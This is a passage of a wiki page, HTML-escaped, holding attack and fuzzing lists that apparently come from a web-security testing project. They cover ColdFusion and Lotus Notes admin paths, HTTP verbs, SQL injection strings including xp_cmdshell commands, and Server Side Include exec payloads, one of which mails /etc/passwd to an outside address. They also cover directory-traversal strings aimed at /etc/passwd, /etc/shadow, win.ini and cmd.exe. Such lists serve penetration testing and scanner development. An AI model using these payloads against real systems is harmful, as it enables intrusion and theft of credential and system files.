.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
